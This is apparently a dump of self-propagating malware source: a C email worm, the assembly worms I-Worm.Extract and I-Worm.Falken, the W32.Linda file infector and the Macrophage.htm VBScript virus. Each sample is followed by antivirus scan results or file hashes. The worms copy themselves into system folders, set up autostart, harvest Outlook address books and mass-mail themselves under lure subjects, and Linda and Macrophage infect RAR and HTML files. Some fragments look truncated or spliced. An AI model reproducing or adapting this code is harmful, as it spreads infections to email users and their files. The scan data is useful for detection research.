tmp[strlen(tmp)-1]=' ';
mess->lpszSubject=tmp;
mSaveMail(sess,NULL,mess,MAPI_LONG_MSGID,NULL,messId);
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
}
} else
mFreeBuffer(mess);
}
} while(mFindNext(sess,0,NULL,messId,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS);
}
mLogoff(sess,0,0,0);
FreeLibrary(hMAPI);
}
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr)
{
char *name[]={"readme","clickme","lookthis","urgent","newgame","winanholiday",
"hello","ForU","important"};
char *ext1[]={".mp3",".htm",".jpg",".gif",".html",".mpeg",".mpg",".htm",".vbs",
".zip",".rar"};
char *ext2[]={".exe",".com",".pif",".scr"};
attname[0]=0;
strcat(attname,name[GetTickCount()&8]);
strcat(attname,ext1[GetTickCount()&10]);
strcat(attname,ext2[GetTickCount()&3]);
MapiMessage mes;
MapiRecipDesc from;
memset(&mes,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mes.lpszSubject=msubject;
mes.lpszNoteText=mbody;
mes.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mes.lpRecips)
return;
memset(mes.lpRecips,0,sizeof(MapiRecipDesc));
mes.lpRecips->lpszName=mailaddr;
mes.lpRecips->lpszAddress=mailaddr;
mes.lpRecips->ulRecipClass=MAPI_TO;
mes.nRecipCount=1;
mes.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mes.lpFiles)
return;
memset(mes.lpFiles,0,sizeof(MapiFileDesc));
mes.lpFiles->lpszPathName=filename;
mes.lpFiles->lpszFileName=attname;
mes.nFileCount=1;
mes.lpOriginator=&from;
mSendMail(sess,0,&mes,0,0);
free(mes.lpRecips);
free(mes.lpFiles);
}
void Welcome()
{
Sleep(750);
MessageBox(NULL,"Software installed on the system.","SETUP",MB_OK|MB_ICONINFORMATION);
}
File Essence.scr received on 05.16.2009 11:31:23 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Stopin!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Stopin.worm.24064
AntiVir 7.9.0.168 2009.05.15 Worm/Stopin.C
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Stopin
Authentium 5.1.2.4 2009.05.15 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Stopin-B
AVG 8.5.0.336 2009.05.15 I-Worm/Stopin
BitDefender 7.2 2009.05.16 Win32.StopIn.B@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Stopin.c
ClamAV 0.94.1 2009.05.15 Worm.Stopin.C
Comodo 1157 2009.05.08 Worm.Win32.Stopin.C
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Stopin.50688
eSafe 7.0.17.0 2009.05.14 Win32.Stopin.c
eTrust-Vet 31.6.6508 2009.05.16 Win32/Stopin.A
F-Prot 4.4.4.56 2009.05.15 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Stopin.c
Fortinet 3.117.0.0 2009.05.16 W32/Stopin.C!worm
GData 19 2009.05.16 Win32.StopIn.B@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Stopin
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Stopin.c
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Stopin.c
McAfee 5616 2009.05.15 W32/Stopin.c@MM
McAfee+Artemis 5616 2009.05.15 W32/Stopin.c@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Stopin.C
Microsoft 1.4602 2009.05.16 Worm:Win32/Stopin.C@mm
NOD32 4080 2009.05.15 Win32/Stopin.C
Norman 6.01.05 2009.05.16 W32/Stopin.C@mm
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Stopin.24064
Panda 10.0.0.14 2009.05.15 W32/Stopin.C
PCTools 4.4.2.0 2009.05.15 I-Worm.Stopin.C
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Stopin.c
Sophos 4.41.0 2009.05.16 W32/Stopin-B
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Stopin.c
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Stopin.c
TrendMicro 8.950.0.1092 2009.05.15 WORM_STOPIN.B
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Essence
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Stopin.C
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Stopin.C
Additional information
File size: 24064 bytes
MD5...: c5ca2b9bea18766448b54c7ecd4c887c
SHA1..: 108ca819544e528b345e8afbc561b1ecda720102
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Extract
Author : PetiK
Date : February 3rd 2002 - February 4th 2002
Size : 5632
Action :
Extract API from DLL directly (the reason of the name of worm)
Copy itself to %SYSDIR%\UPDATEW32.EXE
Create "RUN=" in WIN.INI to start with computer
Display fake message
Send to extractcounter@multimania.com the WAB of Outlook
Take theses adresses to sread itself with MAPI functions.
On 29th display a message box
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
include myinclude.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateDirectoryA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetDateFormatA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetSystemTime
kern GetTimeFormatA
kern GetWindowsDirectoryA
kern lstrcat
kern lstrcmp
kern lstrcpy
kern lstrlen
kern MapViewOfFile
kern SetCurrentDirectoryA
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WriteProfileStringA
kern WritePrivateProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
push 50
push offset verif_worm
call _ptkGetSystemDirectoryA
@pushsz "\UPDATEW32.EXE"
push offset verif_worm
call _ptklstrcat
push esi
push offset verif_worm
call _ptklstrcmp
test eax,eax
jz continue_worm
call CreateDate
push 50
push offset realname
push offset orig_worm
api GetFileTitleA
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbsfile
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
payload:
push offset Systime
call _ptkGetSystemTime
cmp [Systime.wDay],29
jne end_pay
push 40h
@pushsz "I-Worm.Extract"
call e_mess
db "Hi man, you received my worm !",CRLF
db "Don't panic, it doesn't format your computer",CRLF,CRLF
db 9,"Bye and Have a Nice Day.",0
e_mess:
push 0
api MessageBoxA
end_pay:
sh_gsf: push 0
push 5
push offset progra
push 0
api SHGetSpecialFolderPathA
push offset progra
call _ptkSetCurrentDirectoryA
@pushsz "Update Windows 32bits"
call _ptkCreateDirectoryA
@pushsz "\Update Windows 32bits"
push offset progra
call _ptklstrcat
push offset progra
call _ptkSetCurrentDirectoryA
push 0
@pushsz "MAJ.exe"
push offset orig_worm
call _ptkCopyFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset winpath
call _ptkGetWindowsDirectoryA
push offset winpath
call _ptkSetCurrentDirectoryA
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "Outlook_Addr.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_worm:
push 0
api ExitProcess
send_mail:
call CreateDate
call CreateTime
@pushsz "C:\liste.ini"
push offset mail_addr
push offset time
push offset date
call _ptkWritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "dddd, dd MMMM yyyy"
push 0
push 0
push 9
call _ptkGetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
call _ptkGetTimeFormatA
popad
ret
CreateTime EndP
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
verif_worm db 50 dup (0)
vbsfile db 50 dup (0)
winpath db 50 dup (0)
progra db 50 dup (0)
mail_addr db 128 dup (?)
realname db 50 dup (0)
date db 30 dup (?)
time db 9 dup (?)
octets dd ?
inet dd 0
sess dd 0
subject db "Re: Check This...",0
body db "Hi",CRLF
db "This is the file you ask for. Open quickly ! It's very
important",CRLF,CRLF
db 9,"Best Regards",CRLF,CRLF,CRLF
db "Salut,",CRLF
db "Voici le fichier que tu cherches. Ouvre vite ! C'est très
important",CRLF,CRLF
db 9,"Mes sincères salutations",0
filename db "important.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateDirectoryA db "CreateDirectoryA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetDateFormatA db "GetDateFormatA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetSystemTime db "GetSystemTime",0
szGetTimeFormatA db "GetTimeFormatA",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szlstrcmp db "lstrcmp",0
szlstrcpy db "lstrcpy",0
szlstrlen db "lstrlen",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateDirectoryA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetDateFormatA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetSystemTime dd ?
_ptkGetTimeFormatA dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptklstrcmp dd ?
_ptklstrcpy dd ?
_ptklstrlen dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWriteProfileStringA dd ?
_ptkWritePrivateProfileStringA dd ?
end start_worm
end
File Extract.exe received on 05.16.2009 11:58:04 (CET)
Additional information
File size: 5632 bytes
MD5...: f6c5adc3869b24363a81d283908a9978
SHA1..: 8451ec7b8f6b487cd39d3d5ea9acdafc27116b28
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment #
Name : I-Worm.Falken
Author : PetiK
Date : February 5th 2002 - February 8th 2002
Size : 6144
Action :
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetTickCount
kern GetWindowsDirectoryA
kern lstrcat
kern MapViewOfFile
kern SetCurrentDirectoryA
kern SetFilePointer
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WritePrivateProfileStringA
kern WriteProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
call _ptkGetSystemDirectoryA
add edi,eax
mov al,"\"
stosb
call _ptkGetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
call _ptkGetTickCount
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
call _ptkGetTickCount
push 100
pop ecx
xor edx,edx
div ecx
push edx
call _ptkSleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi
push 50
push offset wininit
call _ptkGetWindowsDirectoryA
@pushsz "\WININIT.INI"
push offset wininit
call _ptklstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
call _ptkWritePrivateProfileStringA
copy_w: push 0
push edi
push esi
call _ptkCopyFileA
spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
call _ptkSetCurrentDirectoryA
push 0
@pushsz "winbackup.exe"
push offset orig_worm
call _ptkCopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:
payload:
call _ptkGetTickCount
xor edx,edx
mov ecx,20
div ecx
cmp edx,2
jne end_payload
push 10h
@pushsz "I-Worm.Falken"
call @messpay
db "This is the last warning before the attack.",CRLF
db "United States have to stop controling the world.",0
@messpay:
push 0
api MessageBoxA
end_payload:
prep_spread_worm:
push 0
push 20h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\falken.vbs"
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
push 1
@pushsz "wscript C:\falken.vbs"
call _ptkWinExec
push 2000
call _ptkSleep
@pushsz "C:\falken.vbs"
call _ptkDeleteFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset syspath
call _ptkGetSystemDirectoryA
push offset syspath
call _ptkSetCurrentDirectoryA
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "falkenspread.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: mov counter,0
end_l: xor al,al
stosb
inc counter
cmp counter,20
jne end_l
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
push 0
push 80h
push 4
push 0
push 1
push 40000000h
@pushsz "falkenliste.txt"
call _ptkCreateFileA
xchg eax,ebx
push 2
push 0
push 0
push ebx
call _ptkSetFilePointer
push 0
push offset octets
push e_liste - s_liste
push offset s_liste
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
ret
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
wininit db 50 dup (0)
lect db 50 dup (0)
syspath db 50 dup (0)
octets dd ?
counter dd ?
inet dd 0
sess dd 0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetTickCount db "GetTickCount",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSetFilePointer db "SetFilePointer",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetTickCount dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSetFilePointer dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWritePrivateProfileStringA dd ?
_ptkWriteProfileStringA dd ?
s_vbs: db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\falkenspread.txt")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\falkenspread.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
s_liste:
db "mailto : > "
mail_addr db 50 dup (0)
db " ",CRLF
e_liste:
end start_worm
end
File Falken.exe received on 05.16.2009 11:58:11 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Pettick.worm.6144
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Falkon
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.G@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.AC
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Suspicious File
eTrust-Vet 31.6.6508 2009.05.16 Win32/Falcon.A
F-Prot 4.4.4.56 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm
GData 19 2009.05.16 Win32.Petik.G@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.1
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.Z@mm
NOD32 4080 2009.05.15 Win32/Petik.AC
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6144.C
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6144
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.15 I-Worm.Tractex.B
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.j
Sophos 4.41.0 2009.05.16 W32/Petik-P
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_FALKEN.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Falken
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Tractex.B
Additional information
File size: 6144 bytes
MD5...: f19278caf2e95e3abd31ad269e1b0814
SHA1..: 4b202c2aabe0a59addf103626cfb304835ecda2e
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
comment §
Name : W32.Linda
Data : February 13th 2002
Author : PetiK
Language : Win32asm
Size : 8192 (compressed with ASPack).
Action : Infects rar files and ht* files in the current directory.
.386
locals
jumps
.model flat,STDCALL
api macro x
extrn x:proc
call x
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
.DATA
CRLF equ <13,10>
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
push 50
mov esi,offset orig_virus
push esi
push 0
api GetModuleFileNameA
push 4
push 1000h
push 8192
push 0
api VirtualAlloc
test eax,eax
je end_srch_rar
mov dword ptr [mHnd],eax
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset orig_virus
api CreateFileA
cmp eax,-1
je end_srch_rar
mov dword ptr [fHnd],eax
push 0
mov dword ptr [sizer],0
lea eax,sizer
push eax
push 8192
push dword ptr [mHnd]
push dword ptr [fHnd]
api ReadFile
push dword ptr [mHnd]
api CloseHandle
rar_srch:
push offset ffile
push offset rarmask
api FindFirstFileA
dec eax
jz end_srch_rar
inc eax
mov dword ptr [hFile],eax
inf_rar:
call times
call infect
cmp byte ptr [Err],1
je rar_nxt_srch
call timer
rar_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_rar
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_rar:
htm_srch:
push offset ffile
push offset htmmask
api FindFirstFileA
dec eax
jz end_srch_htm
inc eax
mov dword ptr [hFile],eax
inf_htm:
call infecthtm
htm_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_htm
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_htm:
end_linda:
push 0
api ExitProcess
times: push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je tserr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api GetFileTime
push dword ptr [thFile]
api CloseHandle
mov byte ptr [Err],0
ret
tserr: mov byte ptr [Err],1
ret
timer: push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je trerr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api SetFileTime
push dword ptr [thFile]
api CloseHandle
trerr: ret
infecthtm:
push offset ffile.cFileName
api GetFileAttributesA
cmp eax,1 or 20h
je end_inf_htm
push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je end_inf_htm
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek
push 0
push offset octets
push e_htm - s_htm
call e_htm
s_htm: db "",CRLF,CRLF
db "<SCRIPT Language=VBScript>",CRLF
db "On Error Resume Next",CRLF
db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How
are you ?"
db "<br>If you read these lines, is that you are infected by my Virus Linda."
db "<br>Look at your RAR files. They could be infected too."
db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
e_htm:
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
push 1 or 20h
push offset ffile.cFileName
api SetFileAttributesA
end_inf_htm:
ret
CRC32: cld
push ebx
mov ecx,-1 ;xor ecx,ecx & dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
ends
end start_linda
File w32linda32.exe received on 05.16.2009 19:48:06 (CET)
Additional information
File size: 8192 bytes
MD5...: 2bdfd3609d98f54cc1c8fc7e3f5e925c
SHA1..: 1e1c42c4d1cefd930ca37e60ba8689f3d0da174c
PEiD..: ASPack v2.12
<macrophage>
<html><head><title>Internet Explo$er</title></head><body>
<script language=vbscript>
On Error Resume Next
set fso=createobject("scripting.filesystemobject")
If err.number=429 then
document.write "<font face='Lucida Console' size='2' color=black>You need ActiveX enabled
to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and
click Yes</font>"
Else
Set ws=CreateObject("WScript.Shell")
cache=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Cache")
cook=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Cookies")
desk=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Desktop")
favor=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Favorites")
pers=ws.RegRead
("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders\Personal")
infect(fso.GetSpecialFolder(0))
infect(fso.GetSpecialFolder(1))
infect(fso.GetSpecialFolder(2))
infect(cache)
infect(cook)
infect(desk)
infect(favor)
infect(pers)
If Day(Now())=10 Then
document.write "<font face='verdana' size='2' color=black>Sorry but your browser can't
read this page.<br>Try an another day.<br></font>"
document.write "<font face='verdana' size='2' color=blue><br>GOOD BYE and HAVE A NICE
DAY.</font>"
End If
End If
Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
Set FO = FolderObj.Files
For each cible in FO
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
Set good = fso.OpenTextFile(cible.path, 1, False)
if good.readline <> "<macrophage>" Then
good.close()
Set good = fso.OpenTextFile(cible.path, 1, False)
htmorg = good.ReadAll()
good.close()
Set virus = document.body.createTextRange
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<macrophage>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script></html>
File Macrophage.htm received on 05.16.2009 17:51:50 (CET)
Antivirus Version Last Update Result
